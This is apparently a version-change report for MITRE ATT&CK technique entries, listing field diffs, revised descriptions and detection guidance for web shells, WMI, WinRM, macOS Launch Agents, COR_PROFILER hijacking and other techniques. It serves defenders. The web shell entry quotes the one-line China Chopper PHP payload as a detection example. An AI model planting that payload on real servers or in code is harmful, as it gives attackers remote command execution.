x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsIaaS

[T1584.006] Compromise Infrastructure: Web Services

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:04:40.184000+00:002021-10-17 16:01:48.047000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}

[T1583.006] Acquire Infrastructure: Web Services

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 02:53:19.246000+00:002021-10-17 15:45:01.956000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}

[T1550.004] Use Alternate Authentication Material: Web Session Cookie

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 13:21:37.474000+00:002021-10-12 14:22:09.650000+00:00
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsJen Burns, HubSpot
x_mitre_platformsIaaS

[T1505.003] Server Software Component: Web Shell

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Arnim Rupp, Deutsche Lufthansa AG']
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 19:34:19.752000+00:002021-07-26 13:46:47.993000+00:00
external_references[3]['source_name']US-CERT Alert TA15-314A Web ShellsNSA Cyber Mitigating Web Shells
external_references[3]['description']US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.
external_references[3]['url']https://www.us-cert.gov/ncas/alerts/TA15-314Ahttps://github.com/nsacyber/Mitigating-Web-Shells
x_mitre_detectionWeb shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) <?php @eval($_POST['password']);> Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) <?php @eval($_POST['password']);> Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells) File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells) Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT Alert TA15-314A Web Shells', 'description': 'US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA15-314A'}

[T1059.003] Command and Scripting Interpreter: Windows Command Shell

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may abuse the Windows command shell for executiot1Adversaries may abuse the Windows command shell for executio
>n. The Windows command shell ([cmd](https://attack.mitre.org>n. The Windows command shell ([cmd](https://attack.mitre.org
>/software/S0106)) is the primary command prompt on Windows s>/software/S0106)) is the primary command prompt on Windows s
>ystems. The Windows command prompt can be used to control al>ystems. The Windows command prompt can be used to control al
>most any aspect of a system, with various permission levels >most any aspect of a system, with various permission levels 
>required for different subsets of commands.   Batch files (e>required for different subsets of commands. The command prom
>x: .bat or .cmd) also provide the shell with a list of seque>pt can be invoked remotely via [Remote Services](https://att
>ntial commands to run, as well as normal scripting operation>ack.mitre.org/techniques/T1021) such as [SSH](https://attack
>s such as conditionals and loops. Common uses of batch files>.mitre.org/techniques/T1021/004).(Citation: SSH in Windows) 
> include long or repetitive tasks, or the need to run the sa> Batch files (ex: .bat or .cmd) also provide the shell with 
>me set of commands on multiple systems.  Adversaries may lev>a list of sequential commands to run, as well as normal scri
>erage [cmd](https://attack.mitre.org/software/S0106) to exec>pting operations such as conditionals and loops. Common uses
>ute various commands and payloads. Common uses include [cmd]> of batch files include long or repetitive tasks, or the nee
>(https://attack.mitre.org/software/S0106) to execute a singl>d to run the same set of commands on multiple systems.  Adve
>e command, or abusing [cmd](https://attack.mitre.org/softwar>rsaries may leverage [cmd](https://attack.mitre.org/software
>e/S0106) interactively with input and output forwarded over >/S0106) to execute various commands and payloads. Common use
>a command and control channel.>s include [cmd](https://attack.mitre.org/software/S0106) to 
 >execute a single command, or abusing [cmd](https://attack.mi
 >tre.org/software/S0106) interactively with input and output 
 >forwarded over a command and control channel.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportTrue
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 15:36:02.195000+00:002021-07-26 17:13:07.345000+00:00
descriptionAdversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems. Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows) Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems. Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'SSH in Windows', 'description': 'Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal. Retrieved July 26, 2021.', 'url': 'https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh'}

[T1047] Windows Management Instrumentation

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may abuse Windows Management Instrumentation (WMt1Adversaries may abuse Windows Management Instrumentation (WM
>I) to achieve execution. WMI is a Windows administration fea>I) to execute malicious commands and payloads. WMI is an adm
>ture that provides a uniform environment for local and remot>inistration feature that provides a uniform environment to a
>e access to Windows system components. It relies on the WMI >ccess Windows system components. The WMI service enables bot
>service for local and remote access and the server message b>h local and remote access, though the latter is facilitated 
>lock (SMB) (Citation: Wikipedia SMB) and Remote Procedure Ca>by [Remote Services](https://attack.mitre.org/techniques/T10
>ll Service (RPCS) (Citation: TechNet RPC) for remote access.>21) such as [Distributed Component Object Model](https://att
> RPCS operates over port 135. (Citation: MSDN WMI)  An adver>ack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remo
>sary can use WMI to interact with local and remote systems a>te Management](https://attack.mitre.org/techniques/T1021/006
>nd use it as a means to perform many tactic functions, such >) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operate
>as gathering information for Discovery and remote Execution >s using port 135, whereas WMI over WinRM operates over port 
>of files as part of Lateral Movement. (Citation: FireEye WMI>5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI
> SANS 2015) (Citation: FireEye WMI 2015)>) (Citation: FireEye WMI 2015)  An adversary can use WMI to 
 >interact with local and remote systems and use it as a means
 > to execute various behaviors, such as gathering information
 > for Discovery as well as remote Execution of files as part 
 >of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Cita
 >tion: FireEye WMI 2015)

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['@ionstorm']
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_system_requirements['WMI service, winmgmt, running.\nHost/network firewalls allowing SMB and WMI ports from source to destination.\nSMB authentication.']
values_changed
STIX FieldOld valueNew Value
modified2020-05-13 22:50:51.258000+00:002021-10-15 23:58:07.715000+00:00
descriptionAdversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI) An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
external_references[1]['source_name']Wikipedia SMBMSDN WMI
external_references[1]['description']Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.
external_references[1]['url']https://en.wikipedia.org/wiki/Server_Message_Blockhttps://msdn.microsoft.com/en-us/library/aa394582.aspx
external_references[2]['source_name']TechNet RPCFireEye WMI 2015
external_references[2]['description']Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
external_references[2]['url']https://technet.microsoft.com/en-us/library/cc787851.aspxhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
external_references[3]['source_name']MSDN WMIFireEye WMI SANS 2015
external_references[3]['description']Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.
external_references[3]['url']https://msdn.microsoft.com/en-us/library/aa394582.aspxhttps://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye WMI SANS 2015', 'description': "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.", 'url': 'https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf'}
external_references{'source_name': 'FireEye WMI 2015', 'description': 'Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.', 'url': 'https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf'}

[T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 21:32:54.094000+00:002021-10-16 20:11:13.719000+00:00
x_mitre_version1.11.2

[T1021.006] Remote Services: Windows Remote Management

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use [Valid Accounts](https://attack.mitre.ort1Adversaries may use [Valid Accounts](https://attack.mitre.or
>g/techniques/T1078) to interact with remote systems using Wi>g/techniques/T1078) to interact with remote systems using Wi
>ndows Remote Management (WinRM). The adversary may then perf>ndows Remote Management (WinRM). The adversary may then perf
>orm actions as the logged-on user.  WinRM is the name of bot>orm actions as the logged-on user.  WinRM is the name of bot
>h a Windows service and a protocol that allows a user to int>h a Windows service and a protocol that allows a user to int
>eract with a remote system (e.g., run an executable, modify >eract with a remote system (e.g., run an executable, modify 
>the Registry, modify services).(Citation: Microsoft WinRM) I>the Registry, modify services).(Citation: Microsoft WinRM) I
>t may be called with the `winrm` command or by any number of>t may be called with the `winrm` command or by any number of
> programs such as PowerShell.(Citation: Jacobsen 2014)> programs such as PowerShell.(Citation: Jacobsen 2014) WinRM
 >  can be used as a method of remotely interacting with [Wind
 >ows Management Instrumentation](https://attack.mitre.org/tec
 >hniques/T1047).(Citation: MSDN WMI)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 12:25:03.014000+00:002021-06-23 19:22:52.870000+00:00
descriptionAdversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)
external_references[3]['source_name']Medium Detecting Lateral MovementMSDN WMI
external_references[3]['description']French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.
external_references[3]['url']https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bchttps://msdn.microsoft.com/en-us/library/aa394582.aspx
x_mitre_detectionMonitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement)Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement) Also monitor for remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Medium Detecting Lateral Movement', 'description': 'French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.', 'url': 'https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc'}
x_mitre_data_sourcesService: Service Metadata
Other Version Changes

[T1557.001] Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay

Current version: 1.2

Version changed from: 1.0 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-31 13:54:08.239000+00:002021-09-28 13:09:50.809000+00:00
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_version1.01.2

[T1543.001] Create or Modify System Process: Launch Agent

Current version: 1.2

Version changed from: 1.0 → 1.2


Old Description
New Description
t1Adversaries may create or modify launch agents to repeatedlyt1Adversaries may create or modify launch agents to repeatedly
> execute malicious payloads as part of persistence. Per Appl> execute malicious payloads as part of persistence. When a u
>e’s developer documentation, when a user logs in, a per-user>ser logs in, a per-user launchd process is started which loa
> launchd process is started which loads the parameters for e>ds the parameters for each launch-on-demand user agent from 
>ach launch-on-demand user agent from the property list (plis>the property list (.plist) file found in <code>/System/Libra
>t) files found in <code>/System/Library/LaunchAgents</code>,>ry/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, 
> <code>/Library/LaunchAgents</code>, and <code>$HOME/Library>and <code>~/Library/LaunchAgents</code>.(Citation: AppleDocs
>/LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemo> Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citat
>ns) (Citation: OSX Keydnap malware) (Citation: Antiquated Ma>ion: Antiquated Mac Malware) Property list files use the <co
>c Malware). These launch agents have property list files whi>de>Label</code>, <code>ProgramArguments </code>, and <code>R
>ch point to the executables that will be launched (Citation:>unAtLoad</code> keys to identify the Launch Agent's name, ex
> OSX.Dok Malware).   Adversaries may install a new launch ag>ecutable location, and execution time.(Citation: OSX.Dok Mal
>ent that can be configured to execute at login by using laun>ware) Launch Agents are often installed to perform updates t
>chd or launchctl to load a plist into the appropriate direct>o programs, launch user specified programs at login, or to c
>ories  (Citation: Sofacy Komplex Trojan)  (Citation: Methods>onduct other developer tasks.   Launch Agents can also be ex
> of Mac Malware Persistence). The agent name may be disguise>ecuted using the [Launchctl](https://attack.mitre.org/techni
>d by using a name from a related operating system or benign >ques/T1569/001) command.   Adversaries may install a new Lau
>software. Launch Agents are created with user level privileg>nch Agent that executes at login by placing a .plist file in
>es and are executed with the privileges of the user when the>to the appropriate folders with the <code>RunAtLoad</code> o
>y log in (Citation: OSX Malware Detection) (Citation: OceanL>r <code>KeepAlive</code> keys set to <code>true</code>.(Cita
>otus for OS X). They can be set up to execute when a specifi>tion: Sofacy Komplex Trojan)(Citation: Methods of Mac Malwar
>c user logs in (in the specific user’s directory structure) >e Persistence) The Launch Agent name may be disguised by usi
>or when any user logs in (which requires administrator privi>ng a name from the related operating system or benign softwa
>leges).>re. Launch Agents are created with user level privileges and
 > execute with user level permissions.(Citation: OSX Malware 
 >Detection)(Citation: OceanLotus for OS X) 

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 22:11:45.513000+00:002021-10-15 07:41:40.262000+00:00
descriptionAdversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in /System/Library/LaunchAgents, /Library/LaunchAgents, and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware). Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks. Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command. Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X)
x_mitre_detectionMonitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications. Ensure Launch Agent's ProgramArguments key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy.
x_mitre_version1.01.2
Patches

[T1558.004] Steal or Forge Kerberos Tickets: AS-REP Roasting

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-20 19:30:11.783000+00:002021-06-07 19:23:33.039000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsYossi Nisani, Cymptom

[T1134] Access Token Manipulation

Current version: 2.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 13:40:52.952000+00:002021-10-17 14:51:49.334000+00:00

[T1087] Account Discovery

Current version: 2.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 12:26:11.595000+00:002021-10-13 14:05:15.038000+00:00

[T1098] Account Manipulation

Current version: 2.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 16:21:28.502000+00:002021-10-18 18:57:04.505000+00:00

[T1550.001] Use Alternate Authentication Material: Application Access Token

Current version: 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 18:09:45.539000+00:002021-09-02 17:18:55.891000+00:00

[T1020] Automated Exfiltration

Current version: 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 20:21:10.590000+00:002021-08-16 15:23:38.940000+00:00

[T1547] Boot or Logon Autostart Execution

Current version: 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 13:50:12.837000+00:002021-10-19 04:03:47.056000+00:00

[T1574.012] Hijack Execution Flow: COR_PROFILER

Current version: 1.0


Old Description
New Description
t1Adversaries may leverage the COR_PROFILER environment variabt1Adversaries may leverage the COR_PROFILER environment variab
>le to hijack the execution flow of programs that load the .N>le to hijack the execution flow of programs that load the .N
>ET CLR. The COR_PROFILER is a .NET Framework feature which a>ET CLR. The COR_PROFILER is a .NET Framework feature which a
>llows developers to specify an unmanaged (or external of .NE>llows developers to specify an unmanaged (or external of .NE
>T) profiling DLL to be loaded into each .NET process that lo>T) profiling DLL to be loaded into each .NET process that lo
>ads the Common Language Runtime (CLR). These profiliers are >ads the Common Language Runtime (CLR). These profilers are d
>designed to monitor, troubleshoot, and debug managed code ex>esigned to monitor, troubleshoot, and debug managed code exe
>ecuted by the .NET CLR.(Citation: Microsoft Profiling Mar 20>cuted by the .NET CLR.(Citation: Microsoft Profiling Mar 201
>17)(Citation: Microsoft COR_PROFILER Feb 2013)  The COR_PROF>7)(Citation: Microsoft COR_PROFILER Feb 2013)  The COR_PROFI
>ILER environment variable can be set at various scopes (syst>LER environment variable can be set at various scopes (syste
>em, user, or process) resulting in different levels of influ>m, user, or process) resulting in different levels of influe
>ence. System and user-wide environment variable scopes are s>nce. System and user-wide environment variable scopes are sp
>pecified in the Registry, where a [Component Object Model](h>ecified in the Registry, where a [Component Object Model](ht
>ttps://attack.mitre.org/techniques/T1559/001) (COM) object c>tps://attack.mitre.org/techniques/T1559/001) (COM) object ca
>an be registered as a profiler DLL. A process scope COR_PROF>n be registered as a profiler DLL. A process scope COR_PROFI
>ILER can also be created in-memory without modifying the Reg>LER can also be created in-memory without modifying the Regi
>istry. Starting with .NET Framework 4, the profiling DLL doe>stry. Starting with .NET Framework 4, the profiling DLL does
>s not need to be registered as long as the location of the D> not need to be registered as long as the location of the DL
>LL is specified in the COR_PROFILER_PATH environment variabl>L is specified in the COR_PROFILER_PATH environment variable
>e.(Citation: Microsoft COR_PROFILER Feb 2013)  Adversaries m>.(Citation: Microsoft COR_PROFILER Feb 2013)  Adversaries ma
>ay abuse COR_PROFILER to establish persistence that executes>y abuse COR_PROFILER to establish persistence that executes 
> a malicious DLL in the context of all .NET processes every >a malicious DLL in the context of all .NET processes every t
>time the CLR is invoked. The COR_PROFILER can also be used t>ime the CLR is invoked. The COR_PROFILER can also be used to
>o elevate privileges (ex: [Bypass User Account Control](http> elevate privileges (ex: [Bypass User Account Control](https
>s://attack.mitre.org/techniques/T1548/002)) if the victim .N>://attack.mitre.org/techniques/T1548/002)) if the victim .NE
>ET process executes at a higher permission level, as well as>T process executes at a higher permission level, as well as 
> to hook and [Impair Defenses](https://attack.mitre.org/tech>to hook and [Impair Defenses](https://attack.mitre.org/techn
>niques/T1562) provided by .NET processes.(Citation: RedCanar>iques/T1562) provided by .NET processes.(Citation: RedCanary
>y Mockingbird May 2020)(Citation: Red Canary COR_PROFILER Ma> Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May
>y 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: Gi> 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: Git
>tHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers Ma>Hub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May
>y 2017)> 2017)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-26 16:09:58.920000+00:002021-08-30 21:35:12.049000+00:00
descriptionAdversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 